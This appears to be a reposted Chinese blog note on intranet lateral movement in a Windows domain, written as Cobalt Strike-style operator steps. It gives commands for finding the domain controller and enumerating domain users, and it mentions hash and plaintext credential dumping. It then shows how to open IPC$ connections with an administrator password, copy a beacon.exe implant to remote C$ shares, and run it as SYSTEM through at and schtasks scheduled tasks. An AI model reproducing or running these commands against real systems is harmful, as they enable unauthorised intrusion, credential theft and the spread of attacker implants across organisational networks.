当前位置: 首页 > news >正文

内网渗透横向移动1

1.信息收集

(1)判断域控

shell net time /domain

shell ping OWA2010CN-God.god.org

(2)主机探测

浏览探测->网络探测

主机列表显示:

(3)域用户收集:
shell net user /domain

(4)密码抓取

凭证提取->抓取hash/抓取明文密码

2.at命令横向移动

net use \\192.168.3.21\ipc$ "Admin12345" /user:god.org\administrator  #建立ipc连接

copy beacon.exe \\192.168.3.21\c$#拷贝执行文件到目标机器

at \\192.168.3.21 15:47 c:\beacon.exe#添加计划任务

3.schtasks >=Windows2012

net use \\192.168.3.32\ipc$ "admin!@#45" /user:god.org\administrator#建立ipc连接

copy beacon.exe \\192.168.3.32\c$ #复制文件到其C

schtasks /create /s 192.168.3.32 /ru "SYSTEM" /tn beacon /sc

DAILY /tr c:\beacon.exe /F #创beacon任务对应执行文件

schtasks /run /s 192.168.3.32 /tn beacon /i #运行beacon任务

schtasks /delete /s 192.168.3.21 /tn beacon /f#删除beacon任务


http://www.mrgr.cn/news/77929.html

相关文章:

  • 准备阶段 Profiler性能分析工具的使用(一)
  • 用树莓派Pico实现四位数码管秒表计时器:从基础实现到C++技术详解
  • 微信小程序2-地图显示和地图标记
  • 第三课 Textures纹理资源导入设置检查与优化
  • 服务器模型
  • 基于微信小程序的校园二手交易平台设计与实现,微信小程序(定制+讲解+咨询)校园二手商品在线交易系统、校园二手市场管理与推荐工具、智能化商品交易与推荐平台
  • Redis设计与实现 学习笔记 第二十一章 排序
  • 【Java】Linux、Mac、Windows 安装 Oracle JDK
  • Android 常用命令和工具解析之内存相关
  • 深入解析自适应控制算法及python实现
  • 深入解析自校正控制(STC)算法及python实现
  • Flink转换算子——flatMap/map/filter/keyby/reduce综合案例
  • git使用教程
  • Python学习------第十一天
  • 小白学多线程(持续更新中)
  • 数据结构 (5)栈
  • TCP socket api详解
  • Android 常用命令和工具解析之GPU相关
  • 数字信号处理(Digital Signal Procession)总结
  • 从搭建uni-app+vue3工程开始
  • Linux高阶——1117—TCP客户端服务端
  • HarmonyOS:使用ArkWeb构建页面
  • 工具学习_Docker
  • 用Tauri框架构建跨平台桌面应用:1、Tauri快速开始
  • 学习python的第十三天之函数——函数的返回值
  • 如何使用docker、docker挂载数据,以及让docker使用宿主机器的GPU环境 + docker重启小妙招